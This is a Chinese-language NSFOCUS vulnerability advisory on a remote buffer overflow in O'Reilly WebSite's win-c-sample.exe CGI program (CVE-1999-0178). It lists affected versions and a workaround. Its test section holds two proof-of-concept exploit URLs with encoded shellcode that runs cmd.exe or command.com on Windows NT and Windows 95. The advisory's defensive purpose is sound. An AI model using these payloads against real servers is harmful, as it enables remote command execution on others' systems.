安全研究

安全漏洞
O'Reilly WebSite win-c-sample.exe程序远程缓冲区溢出漏洞

发布日期:1997-01-06
更新日期:1997-01-06

受影响系统:
OReilly Software WebSite 1.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 95
OReilly Software WebSite 1.1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 95
OReilly Software WebSite Professional 1.1b
    - Microsoft Windows NT
    - Microsoft Windows 95
OReilly Software WebSite Professional 1.1c
    - Microsoft Windows NT
    - Microsoft Windows 95
OReilly Software WebSite Professional 2.0
    - Microsoft Windows NT
    - Microsoft Windows 95
描述:
BUGTRAQ  ID: 2078
CVE(CAN) ID: CVE-1999-0178

O'Reilly WebSite (Pro)是一个Windows 平台下的Web服务器软件。

低版本的Website的一个例程存在缓冲溢出问题,远程攻击者可能利用此漏洞以Web进程的权限执行任意指令。

1.1e版的Website for NT Web服务器在/cgi-shl/目录下包含了win-c-sample.exe程序。此程序有严重的缓冲区溢出漏洞,允许攻击者通过溢出攻击执行任意指令。由于WebSite通常运行在较高权限的帐号下,所以该漏洞导致的问题较严重。


<*来源:Solar Designer
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Solar Designer ()提供了如下测试方法:

Windows NT :
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

Windows 95:
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocsx1.htm

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时把win-c-sample.exe移出WEB目录。

厂商补丁:

OReilly Software
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oreilly.com

浏览次数:33890
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障